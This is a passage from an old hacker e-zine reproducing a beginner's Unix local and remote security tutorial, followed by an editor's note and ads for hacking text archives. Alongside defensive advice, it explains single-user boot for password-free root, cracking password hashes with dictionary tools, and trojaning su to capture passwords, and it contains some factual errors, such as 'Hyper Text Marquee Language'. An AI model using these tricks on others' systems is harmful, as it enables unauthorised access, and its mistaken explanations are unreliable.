and graphics and colors and layout, but plain good instructions. These are HTML instructions. HTML stands for Hyper Text Marquee Language, and it is the language used to create HTML pages, which can be read by your browser and used as instructions for how to build and display the web page. The same goes with programming. To create a program, you need to know some sort fo a programming language (C, for example), and then construct the program using commands which will later be given to a compiler (which will turn the source code file into an executable binary file, or in other words, a program which you can run and play around with) or an interpreter (the program runs as source code, and gets executed by a program called an interpreter, which reads the instructions in the source code and performs them. A popular interpreted programming language is Perl. Interpreted programming languages usually run slower, but have their advantages. We won't go into that now, though). Okay, moving on. So now you know what source code is. As I've already explained, Unix was initially distributed freely and in source code form. This means that ANYONE with the right knowledge and skills can create his own version of Unix, to meet his special needs. A different version of Unix is called a distribution, a "distro" or a "flavor". Now go to www.linuxberg.com. Pick the closest mirror site and then enter the distributions page. It will display a list of Unix distributions, each one with it's own characteristics, advantages and disadvantages. This is all nice, but what happens if people start creating versions of Unix without paying attention to compatibility issues? For example, if I would have created my own version of Unix and called ls (the command that lists all files in the current directory in console mode (text-based interface) or in a virtual console (a console within a graphical window)) "list" instead? This means that if someone would have made a program that called the ls command for some purpose, it wouldn't work anymore (unless I create a command called ls that calls my own command - list. But in that case, I have to make sure that list has similar rules to ls). See the problem? Also, if I go to my friend's house, which could be using a different distribution, how could I possibly use his computer if everything is completely different? This is why there are standards. Every Unix distribution has to meet these standards so it will be compatible with other versions. This is also why most (if not all) of the stuff I am about to teach here will work in all distributions. If you have a certain problem or question, ask in our message board (find it at blacksun.box.sk). Oh, almost forgot... in the beginning of this section, I have clearly stated that I like Slackware Linux and OpenBSD more than RedHat Linux and Mandrake Linux. Why is that? Simply because they have some advantages, such as even mroe stability, security, speed and encryption, and they top all the other distributions in these fields. Of course, they are much harder to work with (have you ever tried to install OpenBSD?! To a person who installed Mandrake Linux, which is the easiest to install, and is almost as easy as installing Windows 95, it would look like hell!!). Okay, let's move on to the actual security information, shall we? First Thing's First: Local Security =================================== First of all, let's think: why would you want to improve your computer's local security? Well, if you're the only one using this computer, and you don't intend to let anyone into your computer (at least not intentionally), then you should only read this chapter for pure knowledge. But if you're running a multi-users system, you definetly should improve your local security. What is local security? Well, better local security means that different users on this computer, whether they are local users (they have local access to the computer. They use a keyboard, a monitor and what-not that are directly connected to the actual box, not through some sort of a local area network (LAN) or the Internet) or remote users (users accessing your computer, whether legally or not, using Telnet, SSH, RLogin etc' and through a local network or the Internet), you need to increate your computer's local security. Let's start with a basic lesson about file permissions. Unix File Permissions And The Password File ------------------------------------------- First of all, you need to learn about the way the system works with different users. Here is a mini-tutorial out of the Byte Me page at my website that will explain what and how the Unix password file works, thus explain to you a little more about this subject. Password files == world readable + how do password files look like? +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ First of all, a file that is world readable is a file that can be read by ANYONE on the system, even the most inferior user. On most systems today, the password file (usually /etc/passwd) is world readable. Does this mean ANYONE can get the encrypted passwords and decrypt them? Definetly not! A password file consists of several (or one) lines, when each line represents a user. The password file looks like this: username:password:uid:gid:free text:home directory:shell Username - the user's username. Password - the user's password, encrypted using altered DES encryption (can be cracked in a matter of time, though [note: we'll get to cracking the password file later]). UID - User ID. If your UID is 0, you have root priviledges (nothing can stop you, and you can even type "su username" (without the quotes) to become a different user. Type exit to return to your root shell after you're done. Btw SU stands for Switch User). If two users have the same UID, they'll have identical permissions. GID - Group ID. The same as UID, with root being GID=0. GID let's you set ownership patterns and access patterns for a group of users (or a single user) who have different or identical UIDs but have the same GID. Free text - some free text about the user. For info on how to exploit this field in order to get private information about people, read the Info Gathering tutorial here. Home directory - where the user's private configurations files are stored. Usually /root if you are root, or /usr/your-username or /home/your-username if you're another user. Shell - the program that gets executed once you log in. Usually a command interpreter (a program that receives commands from you and executes them). Now, most systems will make /etc/passwd world-readable, but don't put the passwords in it. Instead, they will put a single character, such as *. The passwords will be stored at the shadow file, which is not world-readable, and is usually stored at /etc/shadow. The shadow file is identical to the /etc/passwd file, only it has the encrypted passwords. Some shadowing programs can also improve the encryption schemes, but that's not important to us right now. The /etc/passwd has to be world readable if you want to: 1) Find out what's the username of a certain UID. Very useful in some situations. For example: each file has an owner. The owner can change access patterns for this file, or change it's ownership. Root can own all files if he/she wants to. The owner's UID is inserted into the file. Programs such as ls (ls stands for list. It views the contents of a directory. For more info about it and it's uses, type "man ls" without the quotes on a Unix system) can tell you who owns a file. If they don't have access to the password file (programs run with your priviledges, unless they are SUID, in which case they run with the priviledges of the user who SUIDed them. People try not to use SUID, because it poses lots of security threats), they will only be able to present you with the UID of the owner. But if they have access to the password file, they can find the appropriate username for this UID. 2) Find out information about people (what's their home directory, what's their shell, what's written in their free text area etc'). 3) Etc' etc' etc'... be creative! EOF In case you're wondering, EOF stands for End Of File. This means that... well, duh! End of file! That's it, you've just finished that nice little mini-tutorial. Now I assume you want to learn how to change file permissions. So, in order to change file permissions, you need to learn how to use the chmod command. Now, I am about to guide you on the process of finding information about Unix commands by yourself. It's quite easy. Okay, let's try man first. Man stands for manual. Man is a command that displays a manual page for a specified command. The syntax is: max command. For example: man ls, man cd, man more etc'. So let's try to type man chmod. AHA! No man entry for chmod... :-/ (some systems might have a man page for chmod) Let's try using info. We type info chmod. AHA! This time, we're getting something. So let's see... it says a little about the chmod command, but it doesn't explain how to use it! Oh, wait, look at this - there are links within this guide. Simply position your cursor within a word, a couple of words or a sentence that link somewhere else (they always have a * in front of them) and hit enter. Keep following links until you learn about chmod and about file permissions. Runlevels --------- I have decided to quote a nice mini-tutorial from the Byte Me page at my website instead of just writing about runlevels all over again (I don't like doing things twice). What Are Unix Runlevels? ++++++++++++++++++++++++ If you've been paying attention to what your Unix box does during startup, you should have noticed that it says: "Entering runlevel x" (where x is a number between 1 and 5) at one point of the bootup stage (after it mounts your root filesystem (your "/" directory) into read-write mode, sets up sound, finds your RPMs ("Finding module dependencies...") etc'). A runlevel is a bootup/shutdown sequence. It consists of a list of commands to run on startup and a list of commands to run on shutdown (or when switching to different runlevels). Now, first of all, let's see how you can switch runlevels. Bah, that's easy. Simply type init x, where x is a number between 0 and 6. Runlevel 0 is for "halt" (turning off your computer, if you have APM -Advanced Power Management, and if you have APMD - APM Daemon, installed. All modern CPUs have APM), runlevel 6 is for reboot and the rest are various runlevels. 5 will bootup everything - it will even automatically run X and ask you for your login and password in a graphical interface (by default, of course. You can change this). Runlevel 1 is considered the single-mode runlevel. It does the least possible (kinda like "safe mode" in Windows) and doesn't even require you to enter a password (but only root can switch runlevels, so you have to be either root or have physical access to the computer during startup (we'll get to that later)). To edit your runlevel list, you can either: a) Go to /etc/rc.d/rcx.d/ (where x is the runlevel's number) and play around within this directory. It contains symbolic links (kinda like shortcuts in Windows. For more information about symbolic links (otherwise known as "symlinks"), type man ln) to programs (including their parameters) that will be executed, and symbolic links to programs that will be killed on shutdown. Play around to find out more (but ALWAYS make backups!!). b) (this should work on most Unix boxes) Switch to the runlevel you want to edit. Then type setup. Go to system services, and select/unselect the services u want to run on startup and kill on shutdown). c) The easiest way - on most systems, you will be able to type the command control-panel within an xterm (a "virtual terminal" - a console window within X-Windows) and get a nice little window thingi with lots of buttons and suchlikes. Find the button that says "runlevel editor" when you put the mouse above it for a second or two. Then click on this button and play around with the programs. I'm sure you'll figure out how to use it yourself. It's quite self-explanitory, and it contains help files and documentation if you really need help. And now, for a nice little runlevels-related hack. Now, if you're reading this document, you're probably a Unix newbie, so you probably use Redhat Linux, Mandrake Linux etc'. If so, you should have a prompt saying "boot:" or "LILO boot:" or "LILO:" when you start your computer, and you could either type Windows or Linux (you can change these names into, say, sucky-OS for Windows and Stable_and_secure_OS for Linux, or anything else you want. Use the linuxconf program to edit LILO's preferences, and use your imagination... :-) ). Now, what happens if you type linux 5? Of course! It boots up Linux in runlevel 5!! But wait! What happens if you type linux 1 or linux single? It runs on runlevel 1 - single user mode, which means... automatic root access! No password needed. :-) Most people simply don't realize how dangerous this could be. EOF Now, imagine that some evil cracker (e.g. your grandma... :-) ) reads this document and then locally roots your computer somehow (the verb 'to root' means 'to get root access to a computer, not necessarily one that runs Unix'). Scary, huh? That was as easy as stealing a candy from a baby (not that I've ever done that... /me looks away... :-) ). Cracking The Password File -------------------------- As you should already know by now, the password file has some encrypted text within it. Let's discuss about the encryption scheme first, shall we? Unix password file encryption is based on an altered version of DES encryption. If you will try to decode an encrypted Unix password (let's call it a hash from now on. That's the proper name for it) using standard DES decoding, you will get a null string. Nothing. Nada. Zero. No, not even zero. You simply won't get anything. So how do you open this door? With a key. :-) Key-based encryption (e.g. PGP, which stands for Pretty Good Privacy, and has very powerful encryption schemes) is an encryption scheme where you need to have a key, which is a set of letters (lowercase or uppercase), numbers, symbols etc' (it could be just numbers, symbols and lowercase letters, all letters, etc'). So in Unix "crypt" (from now on, crypt means Unix password file encryption), the key is actually the first eight characters of the user's password (you can add extra characters to the key, which can be generated randomly, for extra security. These are called salts. I won't explain much about them here because I don't believe I know enough about them to do so), so you need the user's password to decode the hash (but if you have the user's password, why would you want to decode his hash if you already have the password? :-) ). So, crypted passwords cannot be cracked, right? WRONG! You can use a password cracker such as John the Ripper or Cracker Jack (there are both Unix versions and Windows versions. Sorry, I don't have URLs to download them) to crack the hashes. But how do these things work? A password cracker generates random passwords and then tries to break the hash by using this password as the key. If it fails, it simply tries another password until it gets it right. Password crackers can try thousands of passwords per second on modern computers. there are two methods of password cracking - brute-force and dictionary attacks. In brute-force mode, your password cracker guesses passwords systematically. You can set a minimum amount of characters for the password, and tell your cracker what to create the password out of (lowercase letters, uppercase letters, numbers, symbols etc'). In dictionary attacks, your password cracker takes words out of a simple text file called a 'dictionary file'. Each line in this file represents a single word for the password cracker to try. Dictionary files usually have an advantage over brute-force attacks, because if you know that the target's password has something to do with dogs, you could download a dictionary file about dogs. If you know it's the name of some philosopher, you could download a dictionary file containing the names of all known philosophers. You can also download all-purpose dictionaries that contain various words (these usually have the greatest chance to succeed). The best place to download wordlists from is theargon.com. So, as you can see, if someone obtains your hashes somehow, he could decode them and break into your computer. This is why all users on your system should have a long password, and preferably not a dictionary word. If you need help with using a password cracker or have any further questions, try asking them on the message board at blacksun.box.sk (it's ours, btw... :-) ). Trojans ======= Yes, trojans. Most people who read this might be thinking about Netbus, Back Orifice, Sub7 and other Windows trojans. These aren't trojans. Okay, I mean, they ARE trojans, but not this kind of trojans. They are 'remote administration trojans'. First, let's understand what this name means, and then you'll see what they have to do with Unix in general and with local security in particular (as well as remote security). Let's start with the word trojan: Trpjan - In the Greek mithology, There is a story about the 'trojan horse'. The Greek were trying to capture the city of Troy for a reason which is beyond this guide (you should really read the whole story or get the movie or something. It is quite good). They were camping on the outsides of Troy for about ten years and they still didn't manage to get in. Then, they came up with a brilliant plan: the whole army pretended to be leaving the area, and they left a giant wooden horse for the Trojans as some kind of a present (to honor the Trojans for being so good). Within this horse sat a couple of soldiers. When the Trojans found the giant horse, they carried it inside and then, under the cover of night, the soldiers inside it came out, opened the city's gates and let the entire Greek army get in, which eventually lead to the fall of the city of Troy. So, as you see, a trojan program is a program that does not do what it proclaims to be doing. It could either be a harmless joke (a joke program that pretends to delete your entire hard drive or any other kinds of computer joke programs) or a malicious program which could harm your system. Remote administration - To remotely administer a system means to be able to work on this system as if you had local ("physical") access to it. Being able to remotely access your system (or "to remotely login to it") is useful for getting files off your system, working on your system from a distant place etc'. Remote administration trojan - A trojan program that let's the author of the program, the person who sent you the program or any other person in the world access your computer and remotely administer it (this is why Remote Administration Trojans, or RATs, are often called remote administration "backdoors" - they open a "back door" for the attacker to get in). This is exactly like depositing your entire system and evertyhing on it to the hands of the attacker. The most dangerous thing about RATs would probably be that most of them (especially Netbus and Sub7) are extremely easy to use and understand, and come with one or two pages of instructions (yes, they're THAT simple), so any little kid can use them. Most of these "kids" have no idea what this program or other programs that do most of the work for them do, which lead to the nickname "script kiddies" - "lamers" (a lamer is a person who acts immaturely or stupidly) with programs that do all of the work for them. Technically, a script kiddie can crack into the Pentagon if he is given a program that does everything for him. But does he know how this whole thing works? Will he know what to do once he's in? I doubt it. Now, malicious trojan programs can do a lot more than that. There are also trojans that allow the attacker to have local access to any user who runs the program (if root runs it, the whole system is doomed. This is one of the reasons why no sensible system administrator would work as root all the time, and instead make himself a less-priviledged account to work with). This is useful if the attacker has an account on this system and wants to get access to some other user's files (or even root access, which means access to practically everything). Also, if you gain write access to a commonly-used application (such as su, which let's you run a sub-shell as another user by simply giving his password instead of having to relogin. SU stands for Switch User. Oh, by the way, root doesn't need to supply a password to su if he wants to gain access to some other person's account), you can trojan these applications. Let's take su for example - if you manage to change su so it'll send you every username and password which it received, you could eventually capture your target's password or even root's password. So, kids, this is why you should beware of trojans. Be very careful with what you run. Also, there are programs called checksum checkers. These programs perform periodical tests (once a day, once an hour, once a week etc, depending on how you configure them) that determine if the size of some applications (you can descelect default applications to test or add new applications by yourself) has changed. If someone has trojaned one of those applications, it's size should change, but it is also possible (although much harder) to trojan a program without affecting it's size, but that's out of the topic of this guide. Unix Viruses ------------ The computer virus problem is much less harsh under the Unix platform, but if you want to keep your data intact, you should be aware of the problem, which still exists. There is an incredibly small number of viruses in the wild for the Unix operating system (a virus that is "in the wild" is a virus that has gone through a network of any kind and started infecting computers on this network, just like a biological virus, when it escapes a restricted laboratory environment and goes into "the wild" and starts infecting people). This is because virus writers are less motivated to write viruses for Unix, because of the following reasons: A) Most people who use Unix are more mature than other computer users. Virus creators who intend to infect other computers are immature people. B) Because of access restrictions in the Unix operating system, if a user runs a file that is infected with a virus, the virus can't go far, and it can only do what this user has priviledges to do (although, if a root-priviledged user runs a virus, it can infect the whole system and freely travel to other systems). So, because there are files that some users can access and some other users can't, Unix viruses can't spread far. Still, the problem exists, and we want to protect our data, right? This is why you should still get yourself a Unix virus scanner. Because of the extreme lack of viruses in the Unix system, there are no "big titles" of virus scanners. Try going to altavista.com and searching for Unix virus scanners. Download some different ones and compare the quality of their scans and the amount of resources they consume. Encryption ---------- Encrypt your important files. Use PGP for better encryption. If someone penetrates your computer's security, it will be much much harder for him to get your important data if you encrypt it. For more information about encryption, read Black Sun's encryption tutorials at blacksun.box.sk (go to the tutorials page and then find the encryption section. We have some guides for beginners about PGP and encryption in general). Remote Security =============== Why would you want to improve your computer's remote security? DUH! If you ever plan to hook your computer into a LAN, the Internet or any other kind of network, you immediately increase the chance of you getting hacked. You should definetly attend to your remote security (unless you like getting your ass rooted). Also, you should read the local security part first, since it contains a lot of information you need to know before you read this, and also quite a few tricks that work for both local security and remote security. Remote Root Logins ------------------ Before I explain to you what is the issue with remote root logins and how to block them, I need to explain to you what a TTY is first. Unix is a multi-users system, right? And on multi-users systems, many users, each one with his own monitor or any other type of terminal, can work on the same computer, right? Now, this computer is obviously running more than one process (a process is a running program), since it has multiple users on it. Each process receives some input and sends out some output. Well, then, how will this computer know which input is whom's and where to direct the output of each program? You wouldn't want to receive the output of processes that other users are running, right? (well, technically, if you're a malicious cracker, you'd love to receive the output of other users' processes, but we're getting off-topic now). This is why each user has a TTY. TTY stands for Terminal TYpe. Each user has it's own TTY, which can be composed of letters and numbers. That way, the computer knows where the input comes from (from which TTY) and where to direct the output to. Okay, first, let's make an experiment. Run a text-based console of an XTerm window (a console window from within X-Windows, the popular Graphical User Interface, or GUI, of Unix systems) and type the command who. This will show who is logged into the system (his username), when he logged in and what is his TTY. By the way, if you prefer a graphical version of the who command, try typing gw within an XTerm or within a "run command" box in X. This program should come with the gnome window manager. Okay, let's move on. Now, that we know what TTYs are, let's edit the file /etc/securetty with a simple text editor. Now, what do we have here? We have a list of all TTYs that can log in as a root-priviledged user. My /etc/securetty file looks like this: tty1 tty2 tty3 tty4 tty5 tty6 tty7 tty8 Okay, let me explain myself. Your computer should have eight virtual consoles. You can switch virtual consoles by pressing ctrl+alt+F1 for console #1, ctrl+alt+F2 for console #2 etc'. You can imagine how useful this could be. Consoles #7 and #8 are usually reserved for graphical displays, so if you run X, it should appear in #7, and if you run another X process, it should appear in #8. These eight local consoles have these TTYs: tty1 for #1, tty2 for #2 etc'. Now, as you can see, my /etc/securetty file contains only those local TTYs, so no remote user can login as a root-priviledged user into my computer, even if he has all the usernames and the passwords. Now, of course, if someone has all the passwords, he could log in as another user and then use su to switch to root. So the /etc/securetty thing isn't exactly some fail-proof method, but it'll block off some intruders. Watching Your Processes ----------------------- If you intend to have several users logged into your system, you should really watch for what they're running, and how much system resources they're hogging. Here are a few methods to watch your users: Using PS ++++++++ Type in the command ps -aux. Quite a list, huh? Now, if you want it to be more readable, try doing ps -aux | more or directing it's output into a file, like this: ps -aux > some-file-name. If you want to look for specific entries within this list, try doing ps -aux | grep some-text and it'll display lines within the output of ps -aux that contain some-text (or whatever you type in). Oh, by the way, as far as I know, PS stands for ProcesseS. Using Top +++++++++ Type the command top. Cool program, huh? Quite useful... you should have a whole virtual console or a whole XTerm devoted exclusively for it. If you prefer a graphical display, try typing gtop (a graphical version of top that comes with the gnome window manager) or kpm (stands for KDE Process Manager. Comes with the KDE window manager). Eavasdropping +++++++++++++ If you're a root-priviledged user and you want to see what the other users on your system are typing, consider using a command called TTY Watch. It will eavasdrop on the TTY of the user(s) you choose to eavasdrop on, and let you know exactly what they're typing and exactly what they see on their monitors. Try searching for the latest version of ttywatch at Packet Storm Security (packetstorm.securify.com), Security Focus (securityfocus.com), Linux.Box (linux.box.sk), Astalavista (astalavista.box.sk) etc'. Playing With INetD ------------------ First of all, you need to learn what network daemons are and what INetD is. A daemon is a program similar to TSR programs on Microsoft platforms. TSR stands for Terminate and Stay Resident. TSRs locate themselves on your computer's memory, and then stay silent and watch everything. Once certain credentials are met, the program awakes and does something. For example: when your free disk space reaches less than, say, 200MBs, the program alerts you. A daemon is the Unix equivelant of Microsoft's TSRs (well, actually, Unix and it's daemons were around waaaaaaaaay before Microsoft DOS and later Microsoft Windows started selling). So what is a network daemon? Well, obviously, it's a daemon that watches for certain credentials that have something to do with networks. Here are several examples: Example #1: The telnet daemon. Usually listens for incoming connections on port 23, and then, once this credential is met, it displays a login screen to the second party. Once the second party enters the correct combination of a username and a password, it is given a shell environment, where it can interact with your computer and run commands on it. Example #2: The FTP daemon. FTP stands for File Transfer Protocol, and makes it easier for different computers to exchange computer files. More info on my FTP security for extreme newbies tutorial (blacksun.box.sk/ftp.txt). Example #3: A firewall is also a network daemon. Firewalls are programs that filter incoming and outgoing network packets. They awake once a network event occurs, and decide whether to allow or disallow it. Now, let's think. Suppose you have twelve different network daemons on your system. That would take up too much memory for us, right? Then why not just have a single daemon to do all the ditry work for us and consume less memory? This is where INetD comes into the picture. INetD stands for InterNet Daemon. You can configure inetd by editing /etc/inetd.conf (conf stands for configurations). This file should contain instructions on how to edit it. Updating Your Network Daemons ----------------------------- You've just got the latest version of your favorite Unix distribution. It came with an FTP daemon, which you want to run on your system so you could turn it into an FTP server. But then, someone discovers a hole within this FTP daemon, and a new version with a fix for this problem goes out. You don't wanna get caught with your pants down, running an old and buggy FTP daemon, right? Hell, you could get cracked by some script kiddie and lose your entire hard drive! We don't want THAT to happen, now do we? First of all, you need to know when a new hole is discovered. You should watch packetstorm.securify.com on a daily basic, and also subscribe to the BugTraq mailing list (securityfocus.com). You should also look for mailing lists concerning the network daemons (also referred to as network services) you are using. Then, once there are new versions of the network daemons you use, you should download the latest version and update the files on your system. Network Sniffers ---------------- For an excellent paper on network sniffers (what are they, how can they risk your computer's security and how to fight against them), read this excellent paper: blacksun.box.sk/sniffer.txt. DO NOT Use Telnetd! ------------------ DO NOT run the telnet daemon on your system! If you want people to be able to remotely login to your system and run commands on your system, DO NOT use telnet for this purpose. Instead, you should use SSH (SSH stands for Secure SHell). SSH encrypts your sessions, so it'll be harder for intruders to eavasdrop you and/or capture any passwords you enter. Of course, you have to use a special client for SSH, since SSH is very different than telnet, because of the following reasons: A) SSH encrypts your sessions. Telnet merely creates plain-text TCP sessions. B) SSH runs on port 22 by default, while telnet stays on port 23. Although almost every telnet application in existence allows you to create telnet sessions with any remote host and port specified, some telnet applications still use port 23. Anyway, ALL telnet applications have port 23 as their default, so if you type telnet some-host or telnet some-ip, it'll telnet to that host/IP and into port 23. Get sshd and ssh clients at packetstorm.securify.com, securityfocus.com, linux.box.sk, astalavista.box.sk etc'. Basic Packet Filtering ---------------------- First, find these two files: /etc/hosts.allow and /etc/hosts.deny. These two files can be used to form a basic packet filtering system. Let's start with /etc/hosts.deny first. Each line in this file should look like this: host:service Host - a hostname or an IP. You can also use wildcards. For example: *.aol.com would stand for every host that has a hostname that ends with aol.com. Service - what network service(s) do you want to allow/deny to this host? Services are defined by their port number. You can also put ALL instead to block of EVERY well-known port to this host (a well-known port is any port between 0 and 1024. These ports are called well-known ports because each one has a default network service associated with it. For example: port 23 is the default for telnet, port 21 is the default for FTP, port 25 is the default for Sendmail, port 110 is the default for POP3 etc'). Each line within this file represents a combination of a host and a port(s) that you don't want this host to be able to access. This is called basic packet filtering. Now, the /etc/hosts.allow file works exactly like hosts.deny, only it contains hosts that you want to allow access to. Here are a few examples of why you would need such a thing: Example #1: You want to block every well-known port to AOL users besides port 21, so they could access your FTP server. To do this, you put *.aol.com:all in your hosts.deny file and then *.aol.com:21 in your hosts.allow file. As you can see, hosts.allow has a higher priority than hosts.deny. Example #2: You want to block off AOL users from your FTP server on port 21, besides foobar.aol.com, which is actually quite nice and always has something interesting to contribute to your FTP collection. To do this, you put *.aol.com:21 in hosts.deny and foobar.aol.com:21 in your hosts.allow file. Advanced Packet Filtering ------------------------- Yup... firewalls. Firewalls are programs that watch everything that comes in and out of your network or personal computer, and decide what to allow and what to block. Out of their nature, firewalls need root-priviledges to run (or admin priviledges on NT networks). Firewalls usually come with a set of premade rules files. Rules files are files with rules on what to allow and what to deny. These rules files can block DoS attacks and relatively popular methods of hacking. Also, most firewalls come with a 'learning mode' option, which is a way of defining your rules as you go on (whenever something comes in or out, you are asked to either allow or deny it, and the firewall adapts itselfs to your preferences). The best firewall for Unix (and possibly the best firewall in the world) is IP Chains. Search for the latest version at packetstorm.securify.com (search for ipchains, not ip-chains or ip chains or anything. Otherwise, you probably won't find anything), securityfocus.com or linux.box.sk. For help using ipchains (ipchains isn't exactly the most user-friendly firewall in existence), get some ipchains howtos (a howto is a document on how to do something or how to use something), which probably come with the ipchains package anyway, together with the executables, the configurations files etc'. These howtos should help you a lot. DoS Attacks ----------- DoS stands for Denial of Service. DoS attacks deny access to a certain service for a certain person. DoS attacks can crash your computer, disconnect you, crash your web server programs, SMTP server programs, POP3 server programs etc', disallow you access to your Email account (a mailbomb (flooding someone with enormous amounts of Emails. Usually done with some sort of a program which automates this progress) is also considered a DoS attack (although somewhat privitive) because it fills up your mailbox and denies you access to it), block certain remote services and in general anything you can think of that will deny you access to something. To protect yourself against DoS attacks, I recommend either: a) Getting a good firewall (see previous section). b) Subscribing to security mailing lists and checking online databases frequently to get the latest versions of everything and all the latest patches. Security Scanners ----------------- Security scanners automatically test the security of a network by attempting to crack into it in different popular ways. It is advised to run one on your network or home PC (unless you don't run any services on your system, which makes your system much less vulnerable, in which case there is no need to be so paranoid. Just avoid default configurations and read all the rest of the sections and you're pretty much safe) to test it's security, although just running one isn't enough to secure oneself (follow the rest of the instructions in this text and read some other texts and books. This text is in no way complete (ahem... the name is BASIC Local/Remote Unix Security). Try some of the stuff at blacksun.box.sk's books page). In the next part, I will review some of the best scanners available at the time this tutorial was written, although not in much depth and detail, since I am limited in size and time. The Scanners ++++++++++++ Remote security scanners test the security of a remote network or computer over a LAN (Local Area Network), a WAN (Wide Area Network, such as the Internet) or any other kind of network. SATAN ***** Author: Dan Farmer and Weitse Venema. Language written in: C and Perl. Platform built on: some version of Unix. Requirements: Unix, Perl 5.001+, C, IP header files and root access on the system you intend to run Satan from. Satan stands for Security Administrator's Tool for Analyzing Networks). It is the first security scanner that is actually user-friendly. It is built as a website, where you can choose attacks using simple forms, pulldown boxes, radio boxes and check boxes, and it displays all the output in an easily-readable form, ready for printing. Satan also includes a short and easy-to-understand tutorial on each attack, which makes it an excellent source for security study for beginners. If you're interested in network security, it is advised to get Satan and try running it on your computer and scanning your friends (DO NOT scan systems you are not allowed to scan! It is illegal!). If you prefer the command-line approach, Satan can also be run using a simple command-line-based interface. Satan can be obtained from the following URL: http://www.trouble.org/~zen/satan/satan.html As far as I know, there are no Windows NT and Macintosh versions of Satan, but I havn't checked for a long time now. I expect that there should be a Windows NT version soon, if there isn't one already. If you're using any version of Linux, you must make several modifications to run Satan on your system (the next part has been copied from some website. I forgot the website's URL, but I'm not going to credit these folks anyway, since I am sure they have stolen this from some book... forgot the book's name, though...): a) The file tcp_scan makes incompatible select() calls. To fix this problem, Nessus ****** Author: Renaud Deraison. Language written in: C. Platform built on: Linux. Requirements: Linux (most non-Linux distributions will also run it, though, since they all can emulate each other's programs), C, X-Windows and GTK (the version of GTK you will need depends on the version of Nessus you intend to run). Nessu is another excellent remote security scanner. Has a user-friendly graphical user interface and relatively fast scans. Get Nessus from the following URL: http://www.nessus.org IdentTCPScan ************ Author: Dave Goldsmith. Language written in: C. Platform built on: Unix. Requirements: Unix, C, IP header files. IdentTCPScan has a very useful ability: what it does is that it portscans it's target (determines which ports are open on the target host), tells you what service is probably running on this port and tells you which user is running it by his UID. This can reveal some interesting holes. For example: if it discovers that some network or computer is running their web server as UID 0 (remember? UID 0 = root access), this is a serious security hole! If some malicious attacker exploits a hole in, say, one of the CGIs on this website, he could access ANY file on the system, since the web server runs as root, hence is not limited with access. Web servers should run on users that have limited access (in this case, the web server should only have access to the files contained in the website and to it's own files, of course). Unfortunately, I don't have an up-to-date URL. Try searching packetstorm.securify.com or securityfocus.com. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= That's about all for this time, folks. As I have already stated in the introduction (actually, the next part was copied and pasted from the introduction chapter): "I included everything I could possibly think of (that is notable for a beginners guide in this field, of course). With time, I will add more chapters, so make sure you have the latest version by visiting blacksun.box.sk often or subscribing to Black Sun's mailing list (info on how to subscribe at blacksun.box.sk also)." <--! Begin copyright bullshit !--> All copyrights are reserved. You may distribute this tutorial freely, as long as you keep our names and Black Sun Research Facility's URL at the top of this tutorial. I have written this tutorial for you, the readers. But I also wish to remain the author of this guide, meaning I do not want people to change a line or two and then claim that the whole guide is theirs. If you wish to create an altered version of this tutorial, please contact me by Email - barakirs@netvision.net.il. <--! End copyright bullshit !--> @HWA 109.0 Where are the exploits and advisories?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ As mentioned earlier, hack.co.za is currently down, this was a main source for newer exploits, you can visit http://packetstorm.securify.com/ for some 'new' exploits released this year, and http://www.securityfocus.com for advisories since this issue is already an unwieldly size the latest releases will appear in the next issue of the zine, sorry if this disappoints anyone, but we've been busy with other projects and the zine has suffered slightly in its upkeep, hence the lack of weekly updates this year i'm hoping to get back into regular releases starting next issue. Stay tuned. - Ed s @HWA -=----------=- -=----------=- -=----------=- -=----------=- 0 0 0 o O O O 0 =----------=- -=----------=- -=----------=- -=----------=- -=----------=- =----------=- -=----------=- -=----------=- -=----------=- -=----------=- AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ _ _ /\ | | | | (_) (_) / \ __| |_ _____ _ __| |_ _ ___ _ _ __ __ _ / /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` | / ____ \ (_| |\ V / __/ | | |_| \__ \ | | | | (_| | /_/ \_\__,_| \_/ \___|_| \__|_|___/_|_| |_|\__, | __/ | |___/ ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG FOR INCLUSION HERE http://revenger.hypermart.net ±±± ±±±±± ± ± ±±±±±±± ±± ± ±±±±±± ±±±±± ±±± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ±± ± ± ± ±± ±±± ± ± ±±±±±±± ± ± ± ± ±±± ±± ± ± ± ± ± ± ± ± ± ± ±±± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ±±±±± ± ±±±±±±± ± ±± ±±± ±±±±± ± ± 's T E X T Z F I L E HOMEPAGE http://revenger.hypermart.net Here you may find up to 340 text files for: ANARCHY , HACKING , GUIDES , CRACKING , VIRUS , GENERAL , ELECTRONICS , UNIX , MAGAZINES , TOP SECRET , CARDING , U.F.O.s , LOCKPICKING , IRC , PHREAKING , BOOKS AND A-S FILES AVAILABLE! http://revenger.hypermart.net Visit Us Now ! . . ............... . : : . . . . . . __:________ : : ___________ . . . \ < /_____:___ : ( < __( :_______ ) : )______:___\_ (___( : / =====/________|_________/ < | : (________________(====== : (__________________) :wd! . : : : - / - w w w . h a c k u n l i m i t e d . c o m - / - : . . . . . : : . . . . . :...............: . . ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** When people ask you "Who is Kevin Mitnick?" do you have an answer? www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE EVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com 